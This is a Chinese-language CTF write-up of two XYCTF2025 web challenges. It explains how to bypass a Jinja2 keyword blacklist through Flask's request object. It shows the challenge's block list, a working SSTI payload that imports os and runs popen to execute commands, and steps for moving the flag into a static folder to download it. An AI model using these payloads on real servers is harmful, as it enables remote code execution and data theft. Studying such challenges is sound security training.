SSTI之Request浅析利用<\/h1>

环境分析<\/h2>
在XYCTF2025的Web方向两道SSTI题目中，发现禁用了一堆关键字，但request<\/code>没有被禁用。被禁用的关键字包括：<\/p>
lock_within =<\/span> [
<\/span><\/span>    "debug"<\/span>, "form"<\/span>, "values"<\/span>, "headers"<\/span>, "json"<\/span>, "stream"<\/span>, "environ"<\/span>,
<\/span><\/span>    "files"<\/span>, "method"<\/span>, "cookies"<\/span>, "application"<\/span>, 'data'<\/span>, 'url'<\/span>, '<\/span>\'<\/span>'<\/span>, '"'<\/span>,
<\/span><\/span>    "getattr"<\/span>, "_"<\/span>, "{{"<\/span>, "}}"<\/span>, "["<\/span>, "]"<\/span>, "<\/span>\\<\/span>"<\/span>, "\/"<\/span>, "self"<\/span>,
<\/span><\/span>    "lipsum"<\/span>, "cycler"<\/span>, "joiner"<\/span>, "namespace"<\/span>, "init"<\/span>, "dir"<\/span>, "join"<\/span>, "decode"<\/span>,
<\/span><\/span>    "batch"<\/span>, "first"<\/span>, "last"<\/span>, " "<\/span>, "dict"<\/span>, "list"<\/span>, "g."<\/span>,
<\/span><\/span>    "os"<\/span>, "subprocess"<\/span>, "g|a"<\/span>, "GLOBALS"<\/span>, "lower"<\/span>, "upper"<\/span>,
<\/span><\/span>    "BUILTINS"<\/span>, "select"<\/span>, "WHOAMI"<\/span>, "path"<\/span>, "os"<\/span>, "popen"<\/span>, "cat"<\/span>, "nl"<\/span>, "app"<\/span>, "setattr"<\/span>, "translate"<\/span>,
<\/span><\/span>    "sort"<\/span>, "base64"<\/span>, "encode"<\/span>, "<\/span>\\<\/span>u"<\/span>, "pop"<\/span>, "referer"<\/span>,
<\/span><\/span>    "The closer you see, the lesser you find."<\/span>
<\/span><\/span>]
<\/span><\/span><\/code><\/pre>Request对象利用方法<\/h2>
可以通过以下方式查看Request对象的所有方法：<\/p>
from<\/span> flask import<\/span> Flask, request
<\/span><\/span>
<\/span><\/span>app =<\/span> Flask(__name__)
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route('\/debug'<\/span>, methods=<\/span>['GET'<\/span>, 'POST'<\/span>])
<\/span><\/span>def<\/span> debug<\/span>():
<\/span><\/span>    # 打印所有方法名<\/span>
<\/span><\/span>    print("Request对象方法列表："<\/span>)
<\/span><\/span>    for<\/span> method in<\/span> dir(request):
<\/span><\/span>        if<\/span> not<\/span> method.<\/span>startswith("__"<\/span>):  # 过滤魔术方法<\/span>
<\/span><\/span>            print(f<\/span>"- <\/span>{<\/span>method}<\/span>"<\/span>)
<\/span><\/span>    return<\/span> "Check console for method list."<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    app.<\/span>run(debug=<\/span>True<\/span>)
<\/span><\/span><\/code><\/pre>含特殊字符的方法<\/h3>
这些方法含有下划线，在大多数情况下不能使用：<\/p>

__class__<\/code>等魔术方法<\/li>
<\/ul>
不含特殊字符的方法<\/h3>


endpoint<\/strong><\/p>

主要获取该路由的函数名<\/li>
<\/ul>
<\/li>

args & values<\/strong><\/p>

args<\/code>用于GET传参<\/li>
values<\/code>用于POST和GET传参<\/li>
优势在于可以传递多个参数<\/li>
<\/ul>
<\/li>

cookies<\/strong><\/p>

可以传递多个参数<\/li>
<\/ul>
<\/li>

json<\/strong><\/p>

处理JSON格式数据<\/li>
<\/ul>
<\/li>

authorization<\/strong><\/p>

处理授权信息<\/li>
<\/ul>
<\/li>
<\/ol>
实际利用案例<\/h2>
XYCTF-Now you see me 1<\/h3>
构造的利用链：<\/p>
{{request.<\/span>application.<\/span>__globals__.<\/span>__builtins__.<\/span>__import__('os'<\/span>).<\/span>popen('id'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>使用origin<\/code>和authorization<\/code>头进行利用。<\/p>
非预期解：直接读取服务端的app.py<\/code>发现有一个flag。<\/p>
预期解：<\/p>


新建static目录，直接移动文件：<\/p>
mkdir static
<\/span><\/span>mv flag static\/
<\/span><\/span><\/code><\/pre>然后访问下载<\/p>
<\/li>

使用dd<\/code>命令分块写入<\/p>
<\/li>
<\/ol>
XYCTF-Now you see me 2<\/h3>
过滤更多关键字，考虑使用endpoint<\/code>的用法：<\/p>
r3al_ins1de_th0ught
<\/span><\/span><\/code><\/pre>构造链子同上，同样创建static<\/code>文件夹并将flag移动到该目录下访问下载。<\/p>
总结<\/h2>


取值方法多样：<\/p>

不仅可以通过下标取值<\/li>
还可以利用for<\/code>循环+slice(1)<\/code>的方法搭配取值<\/li>
<\/ul>
<\/li>

构造链子多样：<\/p>

不仅可以用config<\/code>开头<\/li>
还可以用request<\/code>、setattr<\/code>等获取eval<\/code><\/li>
<\/ul>
<\/li>

其他利用方式：<\/p>

构造特殊链子利用未被删除的方法找到命令执行点<\/li>
利用沙箱逃逸知识点，找到importlib<\/code>的reload<\/code><\/li>
分别reload os.popen<\/code>和subprocess.Popen<\/code>然后执行RCE<\/li>
<\/ul>
<\/li>
<\/ol>